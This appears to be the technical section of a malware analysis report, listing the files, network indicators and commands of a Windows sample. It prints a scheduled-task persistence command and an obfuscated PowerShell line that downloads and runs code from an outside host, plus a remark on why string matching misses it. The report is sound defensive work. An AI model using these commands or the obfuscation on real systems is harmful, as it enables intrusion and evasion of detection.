Technical Information
- <SYSTEM32>\tasks\update
- %WINDIR%\microsoft.net\framework\v2.0.50727\regsvcs.exe
- %TEMP%\x.exe
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- '45.##.53.124':5552
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- DNS ASK f.###4top.io
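- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 200 /tn "Update" /tr "%TEMP%\x.exe" (with hidden window) [persistence: registers a scheduled task named "Update" that runs %TEMP%\x.exe every 200 minutes; consistent with the <SYSTEM32>\tasks\update file listed above]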
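- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://f.top4top.io/p_1520fd8sw1.jpg') (with hidden window) [the char array decodes to the method name "DownloadString", so the content served at the .jpg URL is fetched as text and executed through Invoke-Expression; the method name is built at run time, so a plain string match on "DownloadString" in the command line will not hit]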
- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 200 /tn "Update" /tr "%TEMP%\x.exe"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://f.top4top.io/p_1520fd8sw1.jpg')
- '%WINDIR%\microsoft.net\framework\v2.0.50727\regsvcs.exe'